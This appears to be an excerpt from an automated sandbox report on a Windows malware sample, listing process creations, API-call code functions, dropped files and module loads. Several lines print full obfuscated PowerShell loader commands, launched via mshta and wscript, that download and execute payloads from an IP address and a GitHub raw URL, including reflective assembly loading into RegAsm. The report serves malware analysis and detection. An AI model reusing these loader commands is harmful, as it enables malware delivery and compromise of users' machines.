                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04235662 push eax; iretd 3_2_04235699
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D222D5 pushad ; iretd 7_2_04D2237A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D2239B pushad ; iretd 7_2_04D2237A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D2233B pushad ; iretd 7_2_04D2237A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00457186 push ecx; ret 11_2_00457199
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045E55D push esi; ret 11_2_0045E566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00457AA8 push eax; ret 11_2_00457AC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434EB6 push ecx; ret 11_2_00434EC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10002806 push ecx; ret 11_2_10002819
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044693D push ecx; ret 12_2_0044694D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00451D54 push eax; ret 12_2_00451D61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00406EEB ShellExecuteW,URLDownloadToFileW,11_2_00406EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
